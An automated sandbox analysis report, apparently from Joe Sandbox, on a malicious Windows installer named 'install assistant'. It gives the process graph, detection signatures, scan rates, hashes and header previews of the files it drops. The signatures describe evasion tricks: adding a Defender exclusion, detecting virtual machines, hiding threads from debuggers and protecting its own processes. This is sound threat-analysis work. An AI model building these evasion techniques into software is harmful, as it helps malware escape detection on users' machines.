behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579693 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 96 97 Multi AV Scanner detection for dropped file 2->97 99 Multi AV Scanner detection for submitted file 2->99 101 Found driver which could be used to inject code into processes 2->101 103 3 other signatures 2->103 11 #U5b89#U88c5#U52a9#U624b_2.0.4.exe 2 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 30 other processes 2->18 process3 file4 95 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, PE32 11->95 dropped 20 #U5b89#U88c5#U52a9#U624b_2.0.4.tmp 3 5 11->20         started        24 sc.exe 1 14->24         started        26 sc.exe 1 16->26         started        28 sc.exe 1 18->28         started        30 sc.exe 1 18->30         started        32 sc.exe 1 18->32         started        34 26 other processes 18->34 process5 file6 81 C:\Users\user\AppData\Local\...\update.vac, PE32 20->81 dropped 83 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->83 dropped 105 Adds a directory exclusion to Windows Defender 20->105 36 #U5b89#U88c5#U52a9#U624b_2.0.4.exe 2 20->36         started        39 powershell.exe 23 20->39         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 25 other processes 34->54 signatures7 process8 file9 85 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, PE32 36->85 dropped 56 #U5b89#U88c5#U52a9#U624b_2.0.4.tmp 4 16 36->56         started        107 Loading BitLocker PowerShell Module 39->107 60 conhost.exe 39->60         started        62 WmiPrvSE.exe 39->62         started        signatures10 process11 file12 87 C:\Users\user\AppData\Local\...\update.vac, PE32 56->87 dropped 89 C:\Program Files (x86)\...\trash (copy), PE32+ 56->89 dropped 91 C:\Program Files (x86)\...\is-AQRNC.tmp, PE32+ 56->91 dropped 93 3 other files (1 malicious) 56->93 dropped 109 Query firmware table information (likely to detect VMs) 56->109 111 Protects its processes via BreakOnTermination flag 56->111 113 Hides threads from debuggers 56->113 115 Contains functionality to hide a thread from the debugger 56->115 64 7zr.exe 2 56->64         started        67 cmd.exe 56->67         started        69 7zr.exe 6 56->69         started        signatures13 process14 file15 79 C:\Program Files (x86)\...\tProtect.dll, PE32+ 64->79 dropped 71 conhost.exe 64->71         started        73 sc.exe 67->73         started        75 conhost.exe 69->75         started        process16 process17 77 conhost.exe 73->77         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.4.exe10%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b_2.0.4.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc10%VirustotalBrowse
C:\Program Files (x86)\Windows NT\is-AQRNC.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-AQRNC.tmp0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll4%VirustotalBrowse
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.4.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579693
                    Start date and time:2024-12-23 07:49:49 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.4.exe
                    Detection:MAL
                    Classification:mal96.evad.winEXE@144/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 74
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 172.202.163.200
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                      Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                          Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                      C:\Program Files (x86)\Windows NT\hrsw.vbc#U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                                        Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                          #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                            Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                              #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                  #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                                    #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                                                      #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):831200
                                                        Entropy (8bit):6.671005303304742
                                                        Encrypted:false
                                                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470119
                                                        Encrypted:true
                                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                                        Malicious:false
                                                        Preview:.@S...."NtS.,................._.?.....r..~...{Dt*?[.U.@..6....G..jJ0..m...^.. ..S......A........M.O..d...|.......5/$@;....?2&.<....l./..u.,aiG.1+..)..?....M.\.xw..ScRH.h'.4L.........!...i...1.1...3;..@..v7$..e..=V Oo..r...<..'...]dg..6E......i.?[.%.uM.f.'....zi..0^....AM....>.`..y.T.8..;..'.T:.=..R..[.l.>z...%H.m.!.Hu.u)...,.F.M!.....d..Xw.B.s..A._...F..Bs....l|^`...o;.T.5f...#Y...*......V....N..4...{.Q..1.F.z..p.rm....SAlV0.lY]....y.....9~.....x........5..o[.. ...u.g.r.a<o.._...@.eN......B.........U.......B...sM...5..B.}.7Lo.o3..IO..5.;..E..Y:e.......[.v..3d.O.?...k..\.....X9.......C..q..j.,...{.../..J....s......m..1.6.D_.sc`...~.?..@.3.6....!..}6ON.q..Qe..6J....PdJ.....D7.k.S\.......7.a.bM&;.......w.....E.E9l6..+t<.yt..$.xb../ ...A....'.*!.AL......Q....>..@.-...n...O.:.P#..P.Uz_..@.VdH.,#........6.R...z./-_.bBp.u..^`.h....Rt.......dN..G....[l...|.,I...bP.f...<"....aIw..$....}....._yZ..y.....{.....g&.?.......T..Dnr...;.Z..,.._>..=m;9..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
                                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                        • Antivirus: Virustotal, Detection: 10%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                                        • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470119
                                                        Encrypted:true
                                                        SSDEEP:6144:PXyeefmG6AmpTDIX5m4kwCHIgLCSQ+pukav5Ew0rCFBp:PTYNmpn2o4kxO1tR9Fv
                                                        MD5:F3E50B3F3BA2DAECD6DFD250FC1FBF59
                                                        SHA1:9D9140B5C80B29527B4D80A57EA7EB2977756F56
                                                        SHA-256:E02FF764DC2A42E59039C9E73BD6F6D337CB8C7646FC13ABFAA5A0799C3BA20E
                                                        SHA-512:F61BE85D5E6AD21B2E1D74B4495F491D1953432E43A4D025C830F8CE6BB49B94CF1355974513FF2979261EFD1FB15DE563ABD2AB32DBAAB88C0721B975634C60
                                                        Malicious:false
                                                        Preview:.@S...."NtS.,................._.?.....r..~...{Dt*?[.U.@..6....G..jJ0..m...^.. ..S......A........M.O..d...|.......5/$@;....?2&.<....l./..u.,aiG.1+..)..?....M.\.xw..ScRH.h'.4L.........!...i...1.1...3;..@..v7$..e..=V Oo..r...<..'...]dg..6E......i.?[.%.uM.f.'....zi..0^....AM....>.`..y.T.8..;..'.T:.=..R..[.l.>z...%H.m.!.Hu.u)...,.F.M!.....d..Xw.B.s..A._...F..Bs....l|^`...o;.T.5f...#Y...*......V....N..4...{.Q..1.F.z..p.rm....SAlV0.lY]....y.....9~.....x........5..o[.. ...u.g.r.a<o.._...@.eN......B.........U.......B...sM...5..B.}.7Lo.o3..IO..5.;..E..Y:e.......[.v..3d.O.?...k..\.....X9.......C..q..j.,...{.../..J....s......m..1.6.D_.sc`...~.?..@.3.6....!..}6ON.q..Qe..6J....PdJ.....D7.k.S\.......7.a.bM&;.......w.....E.E9l6..+t<.yt..$.xb../ ...A....'.*!.AL......Q....>..@.-...n...O.:.P#..P.Uz_..@.VdH.,#........6.R...z./-_.bBp.u..^`.h....Rt.......dN..G....[l...|.,I...bP.f...<"....aIw..$....}....._yZ..y.....{.....g&.?.......T..Dnr...;.Z..,.._>..=m;9..
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56562
                                                        Entropy (8bit):7.996582801995233
                                                        Encrypted:true
                                                        SSDEEP:1536:3F0eJo4+8uBWHKxbKOjr9BhmraXVJ9twDJ0y2Q6XqT5l:36ezuBWHiMaXKmLQ6XqNl
                                                        MD5:E769F3D07898BEF062E8B54B4106F3EC
                                                        SHA1:F5B22B500440E3CDB0DE8FDCF358315F3F189733
                                                        SHA-256:209FEBE4F67AB02005B86988E23CAE0F04BB9792EEE20A022377662BFE27756A
                                                        SHA-512:9A3455BD08A5F8CC5996192298B68E9681876080FC2B95F90954143D0931B10B10C3D5590CA5CE78BAD295D9C9B9A6B9FF00E5DEE429D6712C78C28F0B9E6C12
                                                        Malicious:false
                                                        Preview:.@S......)#\ .............../.q.^J.J...K-..kI(,|....-l.=.bXdT..d.e.H1}..w.....kkO..g<.#.h..k./..J.B.(V.....N.`.mQ.X.=.z..c$.T.n..?T<......8...2|.P=.x..b(.....2..w.p!O.X}.(.Y.&..'n....y!;N2oT.2..\7......64..W.<.>...E...O...:F.2h"|.rq..7.........R.|..V.Z}...Z%..(.E.D.~.?....Va.(....Hx...n.Y...W..F......O~x5AW........:.+.}.H}.8J.0.......9jZ|V...........5 ..Zk....9..?..?2-^..&...E....Y.1f.B9jHR..6.&".?..t.Q];..x...._...//...."....A..G..:...S@R....@:.t.(zp?.L..j....g.KL?h.p....9..+fV.DM.....2{"G.e.....:k.2..L..Z....ga...v...9....}J.HsvBz9. .?..M.F....d.c..!....f.e^H..>.....Okc....3...FHc.x.. ....EF.&.X..e...>..N.a....V........"=9...c....l....G..-z....d ..jW..... ~....m.?...P,m.T.... f..&..!.74..S..<Pw.~....n......~.(t.3.h.?... hL.Q....}.REB..4y...+r.........P..+..[..O.+....6..G.......R..fkJH.C.w...{9(ag.,..*u..s.........>....2...8...$D...C.U5.6.B.W..Q....G..70.h:..lKC..4Q...=...Hw....%...!.x.f.. $..".......4...~.</D.Dx...w..\.Zz=&.~.._..K1|...h....
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56562
                                                        Entropy (8bit):7.996582801995233
                                                        Encrypted:true
                                                        SSDEEP:1536:QjaZEp/McY1uLZ39pjWJjrYs7vYCM2nXyfJzc3n+7xrM:eaZZ89rjCj3vrXyfJzc3E2
                                                        MD5:19706ECE8EF8BE5854CEF996036FD25D
                                                        SHA1:5D6DACF970F731A8629627DB5F5F276541BB5AFA
                                                        SHA-256:04D815A3E4CEB9925032A39AB6239F7B95ED761A957483A64373FDCC25913247
                                                        SHA-512:6912573C4411CA4EE6044FAA3FA5E7381BDB3285808090FAA80E8F35499439778619DD36A4F2D3DF9589DA0AF52926CCBAD6691AF366F031B6CA31B4B65E5A16
                                                        Malicious:false
                                                        Preview:7z..'..............2........R.p....]..M............6.s...............Q.'F5#B],...8$..i.<..L.>.........uq.4......}.}.`...V......E$Nb]...m.v.{../.\..."..Yh.D.....X......r..{.p.............(L~.h4....@.*.7I..h..[...DO.h....U...h.%7.&.l.^W.V.: .D.......j...Wv..^...0(.B..C.W9.$a../.u)...hD...s.qRb..i......n4. .Jc}.E.8.+..m.s.....U.d....p...P.-_MqCn......h.MO.`)..x...46_.;.`...-hmA.O.%....N..^..L..!.........H.t.B.....&*R..f.Y...".J...9.G...qd47..k.....$.[g...O.......S.9Ai.j.`+..x..ig.`9.....F].$......tw.W.o0G..g.8..+..[.|*..z......i.../V(.=...]!.h.K......X.......K.J..C....=9aSD.Y.,.....7}A.$D..2.....Ac.....L.i...KC...{4J[.(g>......2h0.RW.<..89~@.Uy.m.[/..Nw..0wD....,+.z...U.j...e.';..M...N....r..ff......S.@..cLE.0.W.....,.F3...5.(W.N.....z~.L...G.b.u)@L)Ua..!....tI.].^..b.Pe..<v]9..l.y.......".E^....}.W...9....q..r*.c..fNR..},?..U..n..........Z.y..m.:......5..Ey....f.WP..)..jv{..ESi.*...CK..@j.k..p./..{.@.2..0..a.y.32.K.......9.%l....K..sQ.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255975
                                                        Encrypted:true
                                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                        Malicious:false
                                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255979
                                                        Encrypted:true
                                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                        Malicious:false
